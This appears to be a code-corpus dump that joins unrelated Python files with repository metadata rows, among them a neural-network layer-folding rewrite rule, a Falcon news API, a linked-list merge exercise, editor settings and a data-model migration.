E_K2RK = {(K_node_IDs[0], RK_node_IDs[0])}
E_RK2K = {(RK_node_IDs[-1], K_node_IDs[-1])}
E_K2RK2K = E_K2RK | E_RK2K
# disintegrate `E_K2RK` and `E_RK2K` along fibres to speed up rule application
self.F_K2RK = {vK: set(arc for arc in E_K2RK if arc[0] == vK) for vK in set(self.K.nodes)}
self.F_RK2K = {vK: set(arc for arc in E_RK2K if arc[1] == vK) for vK in set(self.K.nodes)}
# # glue together the (sub-)graphs L\K and R\K along the vertices of K
# self.S = nx.compose(self.L, self.RK)
# self.S.add_edges_from(E_K2RK2K)
# since the GRR's L-term has been modified, rebuild the seeker
self.seeker = Seeker(self.L)
# this machinery can generate always-new identifiers for different rule applications
self._counter = itertools.count()
def _get_rule_count(self):
rule_count = ''.join(['FSTEINQBN', __NODE_ID_FORMAT__.format(next(self._counter))])
return rule_count
def core(self, HI, g, nodes_dict):
# generate the substitute (sub-)graph J\I
rule_count = self._get_rule_count()
g_RK2JI = {vRK: '_'.join([rule_count, vRK.replace('R-term/', '')]) for vRK in set(self.RK.nodes)}
JI = nx.relabel_nodes(self.RK, g_RK2JI, copy=True)
# get pointers to the old modules;
# these pointers will enable two actions:
# 1. extracting the arguments required to perform the folding
# 2. extracting the parameters to instantiate the new modules
g_L2H = {vL: vH for vH, vL in g.items()}
mste = nodes_dict[g_L2H['/'.join(['L-term', 'STE'])]].nobj
minq2d = nodes_dict[g_L2H['/'.join(['L-term', 'INQConv'])]].nobj
mbn2d = nodes_dict[g_L2H['/'.join(['L-term', 'BatchNorm'])]].nobj
mreluold = nodes_dict[g_L2H['/'.join(['L-term', 'ReLU'])]].nobj
# fold
weight, bias = foldsteinqconvbn(mste.num_levels, mste.abs_max_value,
minq2d.weight_frozen,
mbn2d.running_mean, mbn2d.running_var, mbn2d.eps, mbn2d.weight, mbn2d.bias)
# build the new modules
mconv = nn.Conv2d(minq2d.in_channels, minq2d.out_channels, minq2d.kernel_size,
stride=minq2d.stride, padding=minq2d.padding, dilation=minq2d.dilation, groups=minq2d.groups,
bias=True).to(torch.device('cpu'))
mconv.weight.data = weight
mconv.bias.data = bias
mrelunew = nn.ReLU(inplace=True)
# register the newly created nodes
vJI_2_ptnode = {}
vJI_2_ptnode[g_RK2JI['/'.join(['R-term', 'Conv'])]] = PyTorchNode(mconv)
vJI_2_ptnode[g_RK2JI['/'.join(['R-term', 'ReLU'])]] = PyTorchNode(mrelunew)
return JI, vJI_2_ptnode
def apply(self, G, nodes_dict, g):
# create new containers
G = G.copy()
nodes_dict = {**nodes_dict}
# characterise the match graph H
VI = {vH for vH, vL in g.items() if vL in set(self.K.nodes)}
VHI = {vH for vH, vL in g.items() if vL not in set(self.K.nodes)}
HI = G.subgraph(VHI)
# generate the substitute (sub-)graph J\I
JI, vJI_2_ptnode = self.core(HI, g, nodes_dict)
# add the substitute (sub-)graph J\I to the main graph G
G = nx.compose(G, JI)
nodes_dict.update(vJI_2_ptnode)
# glue the substitute (sub-)graph J\I to the interface (sub-)graph I
JI2RK_morphisms = Seeker(self.RK).get_morphisms(JI)
assert len(JI2RK_morphisms) == 1
g_JI2RK = JI2RK_morphisms[0]
g_RK2JI = {vRK: vJI for vJI, vRK in g_JI2RK.items()}
for vI in VI:
vK = g[vI]
G.add_edges_from({(vI, g_RK2JI[vRK]) for (_, vRK) in self.F_K2RK[vK]})
G.add_edges_from({(g_RK2JI[vRK], vI) for (vRK, _) in self.F_RK2K[vK]})
# the new modules are fully integerized, so the precision tunnel should not embed integer numbers in floating point numbers
if nodes_dict[vI].ntype == qg.graphs.HelperOutputPrecisionTunnel.__name__:
nodes_dict[vI] = PyTorchNode(qg.graphs.HelperOutputPrecisionTunnel(1.0))
elif nodes_dict[vI].ntype == nn.MaxPool2d.__name__:
pass
else:
raise TypeError # interface nodes should be objects of class `qg.graphs.HelperPrecisionTunnel` only
# discard the match (sub-)graph H\I
G.remove_nodes_from(set(HI.nodes))
for vHI in VHI:
del nodes_dict[vHI]
return G, nodes_dict
def seek(self, G, nodes_dict):
gs = self.seeker.get_morphisms(G)
return gs
| 47.723611 | 143 | 0.619831 | 33,064 | 0.962254 | 0 | 0 | 0 | 0 | 0 | 0 | 9,270 | 0.269783 |
5fcc22d5ecaf0da083c5ac9d8ac997e97cc93417 | 5,896 | py | Python | news_api/endpoints/models.py | rdoume/News_API | 9c555fdc5e5b717b98bcfec27364b9612b9c4aa1 | [
"MIT"
] | 9 | 2019-07-19T13:19:55.000Z | 2021-07-08T16:25:30.000Z | news_api/endpoints/models.py | rdoume/News_API | 9c555fdc5e5b717b98bcfec27364b9612b9c4aa1 | [
"MIT"
] | null | null | null | news_api/endpoints/models.py | rdoume/News_API | 9c555fdc5e5b717b98bcfec27364b9612b9c4aa1 | [
"MIT"
] | 1 | 2021-05-12T01:50:04.000Z | 2021-05-12T01:50:04.000Z | # -*- coding: utf-8 -*-
# System imports
import json
# Third-party imports
import falcon
from news_api.endpoints.vespaSearcher import vespaSearch
from news_api.endpoints.top_entities import getTopNewEntities
from news_api.endpoints.top_clusters import getTopNewCluster
# Local imports
# from news_api import settings
class SimpleSearch(object):
@staticmethod
def on_get(req, resp):
"""[Get request for search]
Arguments:
req {[falcon.request]} -- [Falcon request type]
resp {json} -- [Response of the request return by the server]
Raises:
falcon.HTTPError -- [In case the request is ill-formed,empty, or the server provide no response]"""
try:
search_params = falcon.uri.parse_query_string(req.query_string)
if (
search_params is None
or "query" not in search_params
or len(search_params["query"]) == 0
):
resp.status = falcon.HTTP_400
resp.body = json.dumps({"status": "Error", "message": "Query is empty"})
else:
search_response = vespaSearch(search_params)
if search_response is not None:
resp.status = falcon.HTTP_200
resp.body = json.dumps(
{"status": "OK", "message": "", "result": dict(search_response)}
)
else:
resp.status = falcon.HTTP_500
resp.body = json.dumps(
{"status": "Error", "message": "Vespa Error"}
)
print(req.url)
except Exception as e:
raise falcon.HTTPError(falcon.HTTP_503, "Error:", e)
class TopEntities(object):
def __init__(self, db):
self._db = db
def on_get(self, req, resp):
"""[Get request for search]
Arguments:
req {[falcon.request]} -- [Falcon request type]
resp {json} -- [Response of the request return by the server]
Raises:
falcon.HTTPError -- [In case the request is ill-formed,empty, or the server provide no response]"""
try:
search_params = falcon.uri.parse_query_string(req.query_string)
default_params = {
"country": search_params["country"]
if "country" in search_params
else None,
"category": search_params["category"]
if "category" in search_params
else None,
"count": int(search_params["count"])
if "count" in search_params
else None,
}
if search_params is None or "country" not in search_params:
resp.status = falcon.HTTP_400
else:
list_entities = getTopNewEntities(
self._db.connection,
count=default_params["count"],
country=default_params["country"],
category=default_params["category"],
)
if list_entities is not None:
resp.status = falcon.HTTP_200
resp.body = json.dumps(
{"status": "1", "message": "", "result": list_entities}
)
else:
resp.status = falcon.HTTP_500
resp.body = json.dumps(
{"status": "0", "message": "Entities backend error"}
)
except Exception as e:
raise falcon.HTTPError(falcon.HTTP_503, "Error:", e)
class TopClusters(object):
def __init__(self, db):
self._db = db
def on_get(self, req, resp):
"""[Get request for search]
Arguments:
req {[falcon.request]} -- [Falcon request type]
resp {json} -- [Response of the request return by the server]
Raises:
falcon.HTTPError -- [In case the request is ill-formed,empty, or the server provide no response]"""
try:
search_params = falcon.uri.parse_query_string(req.query_string)
pass
if search_params is None or "country" not in search_params:
resp.status = falcon.HTTP_400
pass
default_params = {
"country": search_params["country"]
if "country" in search_params
else None,
"category": search_params["category"]
if "category" in search_params
else "main",
"count": search_params["count"] if "count" in search_params else None,
"ordering": search_params["ordering"]
if "ordering" in search_params
else None,
}
if "country" not in search_params:
resp.status = falcon.HTTP_400
pass
list_clusters = getTopNewCluster(
self._db.connection,
count=default_params["count"],
country=default_params["country"],
category=default_params["category"],
ordering_method=default_params["ordering"],
) # vespaSearch(search_params)
if list_clusters is not None:
resp.status = falcon.HTTP_200
resp.body = json.dumps(
{"status": "1", "message": "", "result": list_clusters}
)
else:
resp.status = falcon.HTTP_500
resp.body = json.dumps(
{"status": "-1", "message": "Cluster backend error"}
)
except Exception as e:
raise falcon.HTTPError(falcon.HTTP_503, "Error:", e)
| 35.518072 | 111 | 0.518318 | 5,567 | 0.944199 | 0 | 0 | 1,439 | 0.244064 | 0 | 0 | 1,687 | 0.286126 |
5fcda78cf21f154d5256341e1d4f6994551d5ce9 | 858 | py | Python | exercicio9.py | isaacfelipe1/Estrutura_De_Dados_Um_UEA | 79b693d186154b54b7bb0c2dac10cd4cf9886bb3 | [
"Apache-2.0"
] | null | null | null | exercicio9.py | isaacfelipe1/Estrutura_De_Dados_Um_UEA | 79b693d186154b54b7bb0c2dac10cd4cf9886bb3 | [
"Apache-2.0"
] | null | null | null | exercicio9.py | isaacfelipe1/Estrutura_De_Dados_Um_UEA | 79b693d186154b54b7bb0c2dac10cd4cf9886bb3 | [
"Apache-2.0"
] | null | null | null | #9-Faça um programa que leia um número indeterminado de notas. Após esta entrada de dados, faça seguinte:
#. Mostre a quantidade de notas que foram lidas.
#. Exiba todas as notas na ordem em que foram informadas.
#. Calcule e mostre a média das notas.
#. Calcule e mostre a quantidade de notas acima da média calculada.
list=[]
acima_media=[]
notas=float(input("Informe suas notas(-1 para sair\n"))
while(notas>=0):
list.append(notas)
notas=float(input("Informe suas notas(-1 para sair\n"))
media=sum(list)/len(list)
for i, word in enumerate(list):
if word>media:
acima_media+=[word]
soma=len(acima_media)
print('na posição',i,'foi digitado o número ',word)
print(f' A quantidades de notas que foram informados: {len(list)}')
print()
print('=>'*30)
print(f'A média das notas foi {media}')
print(f'{soma}')
print(acima_media) | 35.75 | 105 | 0.708625 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 537 | 0.618664 |
5fcddc4097a230efd88262807f43401aaaeff2ab | 257 | py | Python | p5.py | kmark1625/Project-Euler | e80c4f2044fdbff93331117b8f02aa0becbb0706 | [
"MIT"
] | null | null | null | p5.py | kmark1625/Project-Euler | e80c4f2044fdbff93331117b8f02aa0becbb0706 | [
"MIT"
] | null | null | null | p5.py | kmark1625/Project-Euler | e80c4f2044fdbff93331117b8f02aa0becbb0706 | [
"MIT"
] | null | null | null | from fractions import gcd
def smallestDiv():
"""Finds smallest number that is evenly divisible from 1 through 20"""
return reduce(lambda x,y: lcm(x,y), range(1,21))
def lcm(a,b):
return (a*b) / gcd(a,b)
if __name__ == '__main__':
print smallestDiv()
| 21.416667 | 71 | 0.692607 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 80 | 0.311284 |
5fcf633d461876ef2ed0512751ad534119c618aa | 1,249 | py | Python | src/resnet_datasize_plot.py | chloechsu/nanoparticle | 5e78fe33c2d562aa31d5e458be0dbf52813f20b1 | [
"MIT"
] | 1 | 2021-04-04T23:07:59.000Z | 2021-04-04T23:07:59.000Z | src/resnet_datasize_plot.py | chloechsu/nanoparticle | 5e78fe33c2d562aa31d5e458be0dbf52813f20b1 | [
"MIT"
] | null | null | null | src/resnet_datasize_plot.py | chloechsu/nanoparticle | 5e78fe33c2d562aa31d5e458be0dbf52813f20b1 | [
"MIT"
] | 3 | 2021-01-13T14:50:42.000Z | 2022-03-20T16:19:52.000Z | import argparse
import csv
import glob
import os
import pandas as pd
import matplotlib.pyplot as plt
import numpy as np
import seaborn as sns
sns.set()
shapes = ['TriangPrismIsosc', 'parallelepiped', 'sphere', 'wire']
def main():
trainsizes = []
avg_acc = []
for f in glob.glob('model/resnet18-all-Adam-lr_0.0001*_test_metrics.csv'):
if 'joint' in f or 'nofeature' in f:
continue
print(f)
trainsize = f.split('-')[4]
assert trainsize.startswith('trainsize')
if int(trainsize[10:]) in trainsizes:
print(trainsize[10:])
trainsizes.append(int(trainsize[10:]))
df = pd.read_csv(f)
avg_acc.append(np.mean([df.iloc[0]['accuracy/' + s] for s in shapes]))
aug_ratio = [int((t - 7950.) / 7950.) for t in trainsizes]
print(aug_ratio)
hues = [str(t == 19) for t in aug_ratio]
plt.figure(figsize=(8, 5))
ax = sns.scatterplot(x=aug_ratio[::-1], y=avg_acc[::-1], marker='+',
hue=hues[::-1], s=80)
ax.legend_.remove()
plt.xlabel('Data Augmentation Ratio', fontsize=15)
plt.ylabel('ResNet18-1D Top-1 Accuracy', fontsize=15)
plt.savefig('plots/resnet18_datasize_plot.png')
if __name__ == "__main__":
main()
| 29.046512 | 78 | 0.622898 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 244 | 0.195356 |
5fd0efe4c22b97942030348d8ad7858091215264 | 1,482 | py | Python | pyramid_bootstrap/__init__.py | keitheis/pyramid_bootstrap | e8d6e8b9081427bca264d16a679571c35d3527e5 | [
"BSD-3-Clause"
] | null | null | null | pyramid_bootstrap/__init__.py | keitheis/pyramid_bootstrap | e8d6e8b9081427bca264d16a679571c35d3527e5 | [
"BSD-3-Clause"
] | null | null | null | pyramid_bootstrap/__init__.py | keitheis/pyramid_bootstrap | e8d6e8b9081427bca264d16a679571c35d3527e5 | [
"BSD-3-Clause"
] | 1 | 2018-04-12T14:27:52.000Z | 2018-04-12T14:27:52.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
__author__ = 'Keith Yang'
__email__ = '[email protected]'
__version__ = '0.1.0'
from pyramid.settings import asbool
from .bootstrap import BootstrapFactory
def includeme(config):
DEFAULT = {
'versions': '3.0.3',
'use_min_file': True,
'use_cdn': False,
'static_path': {
'cdn': "//netdna.bootstrapcdn.com/bootstrap/",
'local': 'bootstrap/'
},
'cache_max_age': 3600,
}
settings = config.get_settings()
setting_prefix = "bootstrap."
def get_setting(attr, default=None):
return settings.get(setting_prefix + attr, default)
versions = get_setting('versions', DEFAULT['versions'])
use_min_file = asbool(get_setting("use_min_file", DEFAULT['use_min_file']))
bootstraps = BootstrapFactory.build_bootstraps(versions, use_min_file)
use_cdn = asbool(get_setting("use_cdn"))
if use_cdn:
static_path = DEFAULT['static_path']['cdn']
else:
static_path = get_setting('static_path',
DEFAULT['static_path']['local'])
cache_max_age = get_setting('cache_max_age', DEFAULT['cache_max_age'])
for version in bootstraps:
config.add_static_view(static_path + version,
"pyramid_bootstrap:static/{}".format(version),
cache_max_age=cache_max_age)
config.scan('pyramid_bootstrap.event_subscribers')
| 30.244898 | 79 | 0.625506 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 428 | 0.288799 |
5fd224ae58a35451a109abe33921bfe534a36c4b | 3,043 | py | Python | Data Structures/Linked List/Merge Two Sorted Linked Lists/merge_two_sorted_linked_lists.py | brianchiang-tw/HackerRank | 02a30a0033b881206fa15b8d6b4ef99b2dc420c8 | [
"MIT"
] | 2 | 2020-05-28T07:15:00.000Z | 2020-07-21T08:34:06.000Z | Data Structures/Linked List/Merge Two Sorted Linked Lists/merge_two_sorted_linked_lists.py | brianchiang-tw/HackerRank | 02a30a0033b881206fa15b8d6b4ef99b2dc420c8 | [
"MIT"
] | null | null | null | Data Structures/Linked List/Merge Two Sorted Linked Lists/merge_two_sorted_linked_lists.py | brianchiang-tw/HackerRank | 02a30a0033b881206fa15b8d6b4ef99b2dc420c8 | [
"MIT"
] | null | null | null | #!/bin/python3
import math
import os
import random
import re
import sys
class SinglyLinkedListNode:
def __init__(self, node_data):
self.data = node_data
self.next = None
class SinglyLinkedList:
def __init__(self):
self.head = None
self.tail = None
def insert_node(self, node_data):
node = SinglyLinkedListNode(node_data)
if not self.head:
self.head = node
else:
self.tail.next = node
self.tail = node
def print_singly_linked_list(node, sep, fptr):
while node:
fptr.write(str(node.data))
node = node.next
if node:
fptr.write(sep)
# Complete the mergeLists function below.
#
# For your reference:
#
# SinglyLinkedListNode:
# int data
# SinglyLinkedListNode next
#
#
def mergeLists(head1, head2):
# dummy head node
head_of_merge = SinglyLinkedListNode( 0 )
merge_point = head_of_merge
cur_1, cur_2 = head1, head2
while( cur_1 is not None and cur_2 is not None):
if cur_1.data <= cur_2.data:
new_node = SinglyLinkedListNode( cur_1.data )
# cur_1 move forward
cur_1 = cur_1.next
else:
new_node = SinglyLinkedListNode( cur_2.data )
# cur_2 move forward
cur_2 = cur_2.next
# add into merger linked list
merge_point.next = new_node
# merge_point move forward
merge_point = merge_point.next
# linked list 1 is empty, dump linked list 2 into merger linked list
while cur_2 is not None:
new_node = SinglyLinkedListNode( cur_2.data )
# cur_2 move forward
cur_2 = cur_2.next
# add into merger linked list
merge_point.next = new_node
# merge_point move forward
merge_point = merge_point.next
# linked list 2 is empty, dump linked list 1 into merger linked list
while cur_1 is not None:
new_node = SinglyLinkedListNode( cur_1.data )
# cur_1 move forward
cur_1 = cur_1.next
# add into merger linked list
merge_point.next = new_node
# merge_point move forward
merge_point = merge_point.next
# read head node of merged linked list = next of dummy head node
real_head = head_of_merge.next
return real_head
if __name__ == '__main__':
fptr = open(os.environ['OUTPUT_PATH'], 'w')
tests = int(input())
for tests_itr in range(tests):
llist1_count = int(input())
llist1 = SinglyLinkedList()
for _ in range(llist1_count):
llist1_item = int(input())
llist1.insert_node(llist1_item)
llist2_count = int(input())
llist2 = SinglyLinkedList()
for _ in range(llist2_count):
llist2_item = int(input())
llist2.insert_node(llist2_item)
llist3 = mergeLists(llist1.head, llist2.head)
print_singly_linked_list(llist3, ' ', fptr)
fptr.write('\n')
fptr.close()
| 21.58156 | 72 | 0.612882 | 431 | 0.141637 | 0 | 0 | 0 | 0 | 0 | 0 | 643 | 0.211305 |
39563b416a76edc246cc669718217ec4a6dc8d69 | 199 | py | Python | tools/stress_test.py | chouette254/quo | 8979afd118e77d3d0f93f9fbe8711efada7158c5 | [
"MIT"
] | 5 | 2021-06-17T21:06:39.000Z | 2022-03-11T06:45:51.000Z | tools/stress_test.py | chouette254/quo | 8979afd118e77d3d0f93f9fbe8711efada7158c5 | [
"MIT"
] | 39 | 2021-07-19T19:36:18.000Z | 2022-02-23T14:55:08.000Z | tools/stress_test.py | secretuminc/quo | c4f77d52f015c612d32ed0fc2fc79545af598f10 | [
"MIT"
] | 1 | 2021-05-31T17:19:15.000Z | 2021-05-31T17:19:15.000Z | from quo import Console
from quo.pretty import Pretty
from quo.panel import Panel
DATA = "My name is Quo"
console = Console()
for w in range(130):
console.echo(Panel(Pretty(DATA), width=w))
| 15.307692 | 46 | 0.718593 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 16 | 0.080402 |
3957f752a49e9fed33ab81dcc197e7f08498b9c3 | 4,856 | py | Python | wysihtml5/conf/defaults.py | vkuryachenko/django-wysihtml5 | 5f6fa86ecbfeccfae61b06386f1f6f44dfca94c0 | [
"BSD-2-Clause"
] | 4 | 2015-03-24T20:41:31.000Z | 2021-05-24T15:41:16.000Z | wysihtml5/conf/defaults.py | vkuryachenko/django-wysihtml5 | 5f6fa86ecbfeccfae61b06386f1f6f44dfca94c0 | [
"BSD-2-Clause"
] | 1 | 2017-08-06T18:17:53.000Z | 2017-08-06T18:17:53.000Z | wysihtml5/conf/defaults.py | vkuryachenko/django-wysihtml5 | 5f6fa86ecbfeccfae61b06386f1f6f44dfca94c0 | [
"BSD-2-Clause"
] | 3 | 2015-05-14T15:06:21.000Z | 2021-05-24T15:43:05.000Z | #-*- coding: utf-8 -*-
from django.conf import settings
WYSIHTML5_EDITOR = {
# Give the editor a name, the name will also be set as class
# name on the iframe and on the iframe's body
'name': 'null',
# Whether the editor should look like the textarea (by adopting styles)
'style': 'true',
# Id of the toolbar element, pass false if you don't want
# any toolbar logic
'toolbar': 'null',
# Whether urls, entered by the user should automatically become
# clickable-links
'autoLink': 'true',
# Object which includes parser rules (set this to
# examples/rules/spec.json or your own spec, otherwise only span
# tags are allowed!)
'parserRules': 'wysihtml5ParserRules',
# Parser method to use when the user inserts content via copy & paste
'parser': 'wysihtml5.dom.parse || Prototype.K',
# Class name which should be set on the contentEditable element in
# the created sandbox iframe, can be styled via the 'stylesheets' option
'composerClassName': '"wysihtml5-editor"',
# Class name to add to the body when the wysihtml5 editor is supported
'bodyClassName': '"wysihtml5-supported"',
# By default wysihtml5 will insert <br> for line breaks, set this to
# false to use <p>
'useLineBreaks': 'true',
# Array (or single string) of stylesheet urls to be loaded in the
# editor's iframe
'stylesheets': '["%s"]' % (settings.STATIC_URL +
"wysihtml5/css/stylesheet.css"),
# Placeholder text to use, defaults to the placeholder attribute
# on the textarea element
'placeholderText': 'null',
# Whether the composer should allow the user to manually resize
# images, tables etc.
'allowObjectResizing': 'true',
# Whether the rich text editor should be rendered on touch devices
# (wysihtml5 >= 0.3.0 comes with basic support for iOS 5)
'supportTouchDevices': 'true'
}
WYSIHTML5_TOOLBAR = {
"formatBlockHeader": {
"active": True,
"command_name": "formatBlock",
"render_icon": "wysihtml5.widgets.render_formatBlockHeader_icon"
},
"formatBlockParagraph": {
"active": True,
"command_name": "formatBlock",
"render_icon": "wysihtml5.widgets.render_formatBlockParagraph_icon"
},
"bold": {
"active": True,
"command_name": "bold",
"render_icon": "wysihtml5.widgets.render_bold_icon"
},
"italic": {
"active": True,
"command_name": "italic",
"render_icon": "wysihtml5.widgets.render_italic_icon"
},
"underline": {
"active": True,
"command_name": "underline",
"render_icon": "wysihtml5.widgets.render_underline_icon"
},
"justifyLeft": {
"active": True,
"command_name": "justifyLeft",
"render_icon": "wysihtml5.widgets.render_justifyLeft_icon"
},
"justifyCenter": {
"active": True,
"command_name": "justifyCenter",
"render_icon": "wysihtml5.widgets.render_justifyCenter_icon"
},
"justifyRight": {
"active": True,
"command_name": "justifyRight",
"render_icon": "wysihtml5.widgets.render_justifyRight_icon"
},
"insertOrderedList": {
"active": True,
"command_name": "insertOrderedList",
"render_icon": "wysihtml5.widgets.render_insertOrderedList_icon"
},
"insertUnorderedList": {
"active": True,
"command_name": "insertUnorderedList",
"render_icon": "wysihtml5.widgets.render_insertUnorderedList_icon"
},
"insertImage": {
"active": True,
"command_name": "insertImage",
"render_icon": "wysihtml5.widgets.render_insertImage_icon",
"render_dialog": "wysihtml5.widgets.render_insertImage_dialog"
},
"createLink": {
"active": True,
"command_name": "createLink",
"render_icon": "wysihtml5.widgets.render_createLink_icon",
"render_dialog": "wysihtml5.widgets.render_createLink_dialog"
},
"insertHTML": {
"active": True,
"command_name": "insertHTML",
"command_value": "<blockquote>quote</blockquote>",
"render_icon": "wysihtml5.widgets.render_insertHTML_icon"
},
"foreColor": {
"active": True,
"command_name": "foreColor",
"render_icon": "wysihtml5.widgets.render_foreColor_icon"
},
"changeView": {
"active": True,
"command_name": "change_view",
"render_icon": "wysihtml5.widgets.render_changeView_icon"
},
}
# This is necessary to protect the field of content in cases where
# the user disables JavaScript in the browser, so that Wysihtml5 can't
# do the filter job.
WYSIHTML5_ALLOWED_TAGS = ('h1 h2 h3 h4 h5 h6 div p b i u'
' ul ol li span img a blockquote')
| 36.787879 | 76 | 0.635914 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3,570 | 0.735173 |
395a96908738ec18c9180da4437fee979a2a2992 | 6,496 | py | Python | protocols/migration/migration_participant_100_to_reports_300.py | Lucioric2000/GelReportModels | 1704cdea3242d5b46c8b81ef46553ccae2799435 | [
"Apache-2.0"
] | 14 | 2016-09-22T10:10:01.000Z | 2020-09-23T11:40:37.000Z | protocols/migration/migration_participant_100_to_reports_300.py | Lucioric2000/GelReportModels | 1704cdea3242d5b46c8b81ef46553ccae2799435 | [
"Apache-2.0"
] | 159 | 2016-09-22T11:08:46.000Z | 2021-09-29T13:55:52.000Z | protocols/migration/migration_participant_100_to_reports_300.py | Lucioric2000/GelReportModels | 1704cdea3242d5b46c8b81ef46553ccae2799435 | [
"Apache-2.0"
] | 17 | 2016-09-20T13:31:58.000Z | 2020-10-19T04:58:19.000Z | from protocols import reports_3_0_0 as participant_old
from protocols import participant_1_0_0
from protocols.migration import BaseMigration
class MigrationParticipants100ToReports(BaseMigration):
old_model = participant_1_0_0
new_model = participant_old
def migrate_pedigree(self, old_instance):
"""
:param old_instance: org.gel.models.participant.avro.Pedigree 1.0.0
:rtype: org.gel.models.report.avro RDParticipant.Pedigree 3.0.0
"""
new_instance = self.convert_class(self.new_model.Pedigree, old_instance)
new_instance.versionControl = self.new_model.VersionControl()
new_instance.gelFamilyId = old_instance.familyId
new_instance.participants = self.convert_collection(
old_instance.members, self._migrate_member_to_participant, family_id=old_instance.familyId)
return self.validate_object(object_to_validate=new_instance, object_type=self.new_model.Pedigree)
def _migrate_member_to_participant(self, old_member, family_id):
new_instance = self.convert_class(self.new_model.RDParticipant, old_member)
new_instance.gelFamilyId = family_id
new_instance.pedigreeId = old_member.pedigreeId or 0
new_instance.isProband = old_member.isProband or False
new_instance.gelId = old_member.participantId
new_instance.sex = self._migrate_sex(old_sex=old_member.sex)
new_instance.personKaryotipicSex = self._migrate_person_karyotypic_sex(old_pks=old_member.personKaryotypicSex)
if old_member.yearOfBirth is not None:
new_instance.yearOfBirth = str(old_member.yearOfBirth)
new_instance.adoptedStatus = self._migrate_adopted_status(old_status=old_member.adoptedStatus)
new_instance.lifeStatus = self._migrate_life_status(old_status=old_member.lifeStatus)
new_instance.affectionStatus = self._migrate_affection_status(old_status=old_member.affectionStatus)
new_instance.hpoTermList = self.convert_collection(
old_member.hpoTermList, self._migrate_hpo_term, default=[])
new_instance.samples = self.convert_collection(old_member.samples, lambda s: s .sampleId)
new_instance.versionControl = self.new_model.VersionControl()
if old_member.consentStatus is None:
new_instance.consentStatus = self.new_model.ConsentStatus(
programmeConsent=True, primaryFindingConsent=True, secondaryFindingConsent=True,
carrierStatusConsent=True
)
if old_member.ancestries is None:
new_instance.ancestries = self.new_model.Ancestries()
if old_member.consanguineousParents is None:
new_instance.consanguineousParents = self.new_model.TernaryOption.unknown
if new_instance.disorderList is None:
new_instance.disorderList = []
return new_instance
def _migrate_hpo_term(self, old_term):
new_instance = self.convert_class(target_klass=self.new_model.HpoTerm, instance=old_term) # type: self.new_model.HpoTerm
new_instance.termPresence = self._migrate_ternary_option_to_boolean(ternary_option=old_term.termPresence)
return new_instance
def _migrate_ternary_option_to_boolean(self, ternary_option):
ternary_map = {
self.old_model.TernaryOption.no: False,
self.old_model.TernaryOption.yes: True,
}
return ternary_map.get(ternary_option, None)
def _migrate_affection_status(self, old_status):
status_map = {
self.old_model.AffectionStatus.AFFECTED: self.new_model.AffectionStatus.affected,
self.old_model.AffectionStatus.UNAFFECTED: self.new_model.AffectionStatus.unaffected,
self.old_model.AffectionStatus.UNCERTAIN: self.new_model.AffectionStatus.unknown,
}
return status_map.get(old_status, self.new_model.AffectionStatus.unknown)
def _migrate_life_status(self, old_status):
status_map = {
self.old_model.LifeStatus.ABORTED: self.new_model.LifeStatus.aborted,
self.old_model.LifeStatus.ALIVE: self.new_model.LifeStatus.alive,
self.old_model.LifeStatus.DECEASED: self.new_model.LifeStatus.deceased,
self.old_model.LifeStatus.UNBORN: self.new_model.LifeStatus.unborn,
self.old_model.LifeStatus.STILLBORN: self.new_model.LifeStatus.stillborn,
self.old_model.LifeStatus.MISCARRIAGE: self.new_model.LifeStatus.miscarriage,
}
return status_map.get(old_status, self.new_model.LifeStatus.alive)
def _migrate_adopted_status(self, old_status):
status_map = {
self.old_model.AdoptedStatus.notadopted: self.new_model.AdoptedStatus.not_adopted,
self.old_model.AdoptedStatus.adoptedin: self.new_model.AdoptedStatus.adoptedin,
self.old_model.AdoptedStatus.adoptedout: self.new_model.AdoptedStatus.adoptedout,
}
return status_map.get(old_status, self.new_model.AdoptedStatus.not_adopted)
def _migrate_person_karyotypic_sex(self, old_pks):
pks_map = {
self.old_model.PersonKaryotipicSex.UNKNOWN: self.new_model.PersonKaryotipicSex.unknown,
self.old_model.PersonKaryotipicSex.XX: self.new_model.PersonKaryotipicSex.XX,
self.old_model.PersonKaryotipicSex.XY: self.new_model.PersonKaryotipicSex.XY,
self.old_model.PersonKaryotipicSex.XO: self.new_model.PersonKaryotipicSex.XO,
self.old_model.PersonKaryotipicSex.XXY: self.new_model.PersonKaryotipicSex.XXY,
self.old_model.PersonKaryotipicSex.XXX: self.new_model.PersonKaryotipicSex.XXX,
self.old_model.PersonKaryotipicSex.XXYY: self.new_model.PersonKaryotipicSex.XXYY,
self.old_model.PersonKaryotipicSex.XXXY: self.new_model.PersonKaryotipicSex.XXXY,
self.old_model.PersonKaryotipicSex.XXXX: self.new_model.PersonKaryotipicSex.XXXX,
self.old_model.PersonKaryotipicSex.XYY: self.new_model.PersonKaryotipicSex.XYY,
self.old_model.PersonKaryotipicSex.OTHER: self.new_model.PersonKaryotipicSex.other,
}
return pks_map.get(old_pks)
def _migrate_sex(self, old_sex):
sex_map = {
self.old_model.Sex.MALE: self.new_model.Sex.male,
self.old_model.Sex.FEMALE: self.new_model.Sex.female,
self.old_model.Sex.UNKNOWN: self.new_model.Sex.unknown,
}
return sex_map.get(old_sex, self.new_model.Sex.undetermined)
| 56.982456 | 129 | 0.736761 | 6,352 | 0.977833 | 0 | 0 | 0 | 0 | 0 | 0 | 193 | 0.029711 |
395b088785153a0b12425d78d2c97981d28c0b99 | 584 | py | Python | bluebottle/test/factory_models/pages.py | terrameijar/bluebottle | b4f5ba9c4f03e678fdd36091b29240307ea69ffd | [
"BSD-3-Clause"
] | 10 | 2015-05-28T18:26:40.000Z | 2021-09-06T10:07:03.000Z | bluebottle/test/factory_models/pages.py | terrameijar/bluebottle | b4f5ba9c4f03e678fdd36091b29240307ea69ffd | [
"BSD-3-Clause"
] | 762 | 2015-01-15T10:00:59.000Z | 2022-03-31T15:35:14.000Z | bluebottle/test/factory_models/pages.py | terrameijar/bluebottle | b4f5ba9c4f03e678fdd36091b29240307ea69ffd | [
"BSD-3-Clause"
] | 9 | 2015-02-20T13:19:30.000Z | 2022-03-08T14:09:17.000Z | from builtins import object
from datetime import timedelta
import factory
from django.utils.timezone import now
from bluebottle.pages.models import Page
from .accounts import BlueBottleUserFactory
